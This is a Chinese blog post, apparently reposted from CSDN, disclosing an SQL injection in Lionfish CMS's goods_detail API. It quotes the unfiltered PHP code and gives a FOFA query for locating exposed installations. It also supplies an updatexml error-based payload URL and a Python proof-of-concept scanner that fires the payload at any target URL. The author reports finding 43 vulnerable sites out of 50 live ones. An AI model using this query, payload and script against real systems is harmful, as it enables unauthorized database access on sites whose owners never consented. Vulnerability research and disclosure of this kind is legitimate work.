狮子鱼cms-SQL注入

最新推荐文章于 2024-05-25 22:00:00 发布

不是小火火

最新推荐文章于 2024-05-25 22:00:00 发布

阅读量2.1k

点赞数 1

分类专栏：漏洞挖掘文章标签： sql php 数据库

原文链接：https://blog.csdn.net/weixin_42633229/article/details/117070546

版权

漏洞挖掘专栏收录该内容

1 篇文章 0 订阅

订阅专栏

狮子鱼CMS ApiController.class.php 参数过滤存在不严谨，导致SQL注入漏洞
FOFA语法：

“/seller.php?s=/Public/login”

后台登录界面

漏洞点:ApiController.class.php

public function goods_detail()
    {
        $goods_id = I('get.goods_id');
        //gallery =>img_url
        //goods goods.goods_desc  goods_name group_price  market_price  sell_count group_number 

        $sql="select g.*,gd.description,gd.summary,gd.tag from ".
        C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id;

        $goods_arr=M()->query($sql);

        $qian=array("\r\n");
        $hou=array("<br/>");
        $goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']); 

        $sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id;
        $goods_image=M()->query($sql);

        $gallery = array();
        $default_image = '';
        foreach($goods_image as $val)
        {
            $val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/image/'.$val['image'];

            if(empty($default_image))
            {
                $default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
            }

            $gallery[] = array('img_url' => $val['img_url']); 
        }

        $goods = $goods_arr[0];

16行的$goods_id没有进行严格过滤，导致sql注入。
路径：

https://www.xxx.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)
验证：

POC

# -*- coding:utf-8 -*-
import requests
import re
import json
import sys
import urllib3

urllib3.disable_warnings() #忽略https证书告警

vunl_path = "/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)"

def POC(url):
    target_url = url + vunl_path
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",

    }
    try:
        response = requests.get(url=target_url, headers=headers, verify=False, timeout=10)
        print("正在测试：", target_url)
        if "syntax" in response.text:
            print("上述地址存在SQL注入")

    except Exception as e:
        print("请求失败！")
        sys.exit(0)

if __name__ == '__main__':
    print("python3 poc.py http://xx.xx.xx.xx")
    addr = str(input("Please input url"))
    POC(addr)

结果：

没有fofa会员的情况下50个请求里面有43个存在SQL注入。
————————————————
版权声明：本文为CSDN博主「wwxxee」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/weixin_42633229/article/details/117070546

不是小火火

关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
4
评论
狮子鱼cms-SQL注入

狮子鱼CMS ApiController.class.php 参数过滤存在不严谨，导致SQL注入漏洞FOFA语法： “/seller.php?s=/Public/login”后台登录界面漏洞点:ApiController.class.phppublic function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url //go...
复制链接

扫一扫